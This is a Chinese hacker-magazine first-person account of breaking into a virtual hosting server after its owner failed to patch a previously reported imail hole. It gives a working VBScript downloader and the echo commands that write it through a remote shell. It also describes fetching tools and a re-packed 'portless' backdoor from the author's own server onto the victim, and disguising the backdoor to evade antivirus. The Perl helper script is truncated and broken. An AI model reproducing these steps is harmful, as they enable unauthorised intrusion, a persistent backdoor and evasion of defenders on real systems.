记一次完整入侵过程(图)

帅精灵

文章作者：孟方明[-273℃@EST]安全中国 www.anqn.com

发表于《黑客X档案》某期杂志上（具体哪期我确实给忘了）


还记得不久前因为一个imail漏洞而轻松得到了一个虚拟主机的最高权限，事隔也有一个多星期了吧。本以为通知了管理员，应该早就打上了（该漏洞的修补是很容易的）。晚上1点1刻，我完成了另一篇稿子的抓图工作后突然想去看看。结果却让我甚是无奈，如图一。



既然你那么不珍惜，我不要白不要了，可让我没想到的是明明已经得到了system权限，整个入侵过程还是伤透了我的脑筋。为什么？？请往下看。
第一章 午夜被困

现在是凌晨1点25分33秒，在我决定入侵的N秒后，从图一中的 sourcepath = "\device\cdrom0\" 首先判断该操作系统是2000 pro（这种判断是我常用的判断方式，一般情况如果你在查看c:\wintnt\ssytem32\$winnt$.inf这个文件时发现sourcepath =后面的内容是"\device\cdrom0\"或者 "\device\cdrom0\PRO\"时说明系统是2000 pro，如果在其后出现了SVR等字样时说明是2000服务器版，可是我在这里却判断错了，详情请继续往下看）。
这个shell本来就是system权限的，所以不存在权限提升的问题了，本来想新建一个管理员，然后开个telnet算了。可是这个方法很快就被否定了，因为对方只开放了21，25，80，110四个端口，而我在shell里用netstat -an却发现不只这几个开放端口，所以判断很可能有防火墙，那么主动连接型的后门估计是没戏了。先不管这个了，看看该怎么上传吧！这个难不倒我，第一个上的是tftp，熟练地操作完毕，结果如图二。



汗……看样子没那么简单。没关系，不是还有ftp嘛，先把东东上传到偶的私人ftp上，然后在肉鸡上如图三那样操作，晕！竟然会出那种错误，我有点坐不住了！



剩下的半个小时，我就是在不断的更换再更换，尝试再尝试已知的上传方式中度过。在这段时间里，唯一的收获就是找到了该虚拟主机的web目录，于是我曾经尝试用echo命令一行一行地将一个有上传功能的asp写入到肉鸡的web目录里，以便用http方式来上传。可是写到一半就卡住，原因就是那个该死的"&"符号，大家都知道在cmd下"&"是用来连接两个命令的，在asp的代码里会经常"&"是用来连接字符串的，这就出了问题，在我用echo命令写入 file.SaveAs Server.mappath(formPath&file.FileName) 时出现了如图四的问题。



在当时我可真是绝望透顶了，因为我并不知道该怎么把"&"解决掉（不过后来过了几天，我才知道再"&"前面加一个"^"就可以解决了！！！我差点没气死！！）。于是，我又在极度失望中找寻新的上传方法。
第二章 梦醒时分


在我证实了肉鸡上的cscript.exe还是可用的后（不信管理员还能把它也干掉？），决定还是把思路放到vbs上。要找一个既可以上传又不需要"&"的vbs……对了！！记得在灰色看到过一个vbs脚本叫iget.vbs可以用XMLHTTP对象使用http将一个文件下载到本地！！于是赶紧的找到iget.vbs看看，发现代码挺长而且也有"&"。再仔细阅读代码后发现，真正实现下载功能的就那么几行我整理成一个hget.vbs，内容如下：
On Error Resume Next
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2


哈哈！！不错！代码不长，而且也没有"&"！！不过似乎还是长了点，用echo命令一个一个来还是显得麻烦。于是又想了一个办法，用perl写了一个脚本echo.pl，内容如下：
#!usr/bin/perl -w

close MINE;
close TEMP;
这样，我在cmd下输入echo.pl hget.vbs回车后（当然你必须安装了activeperl），就会在同目录下生成一个done.txt，内容如下：
echo On Error Resume Next >>hget.vbs
echo Dim iRemote,iLocal >>hget.vbs
echo iLocal=LCase(WScript.Arguments(1)) >>hget.vbs
echo iRemote=LCase(WScript.Arguments(0)) >>hget.vbs
echo Set xPost=createObject("Microsoft.XMLHTTP") >>hget.vbs
echo xPost.Open "GET",iRemote,0 >>hget.vbs
echo xPost.Send() >>hget.vbs
echo Set sGet=createObject("ADODB.Stream") >>hget.vbs
echo sGet.Mode = 3 >>hget.vbs
echo sGet.Type = 1 >>hget.vbs
echo sGet.Open() >>hget.vbs
echo sGet.Write(xPost.responseBody) >>hget.vbs
echo sGet.SaveToFile iLocal,2 >>hget.vbs



这样就方便多了，然后我就可以全部复制，然后在肉鸡的shell里单击鼠标右键就搞定了！如图五。



哈哈成功写入！！赶紧的试试看是否可以用如图六。



程序停止了一段时间（这段时间要看你的要下载的东东的大小了）。看到了嘛，那个wget.exe乖乖地躺在那呢（wget.exe是个cmd下的下载工具，为什么要下载它呢？因为那个hget.vbs毕竟不太好用，所以下个wget.exe方便点）。好了！！一切似乎顺利得多了！下一步该找一个好的后门了。
第三章 这张旧船票还能登上你的船

根据肉鸡实际情况的考虑，用主动型的后门是不行的。那么最好用反弹的，但是像灰鸽子之类的体积大不说了，能不能逃过"条子"的眼睛还是个问题。找来找去，还是觉得portless好，体积小，平时不开端口，想用的时候就可以激活。不过这个后门也被"条子"们给盯上了，还好还有没加过"伪装"的程序，在本地配置好portless后（培植方法就不多说了，地球人都知道），换了一个新壳再上传到我的个人ftp上。然后在肉鸡用wget.exe来下载，如图七。



下载完后就是安装了，如图八。



成功安装！看样子换了壳后逃过了"条子"的监视了。我们来测试一下吧。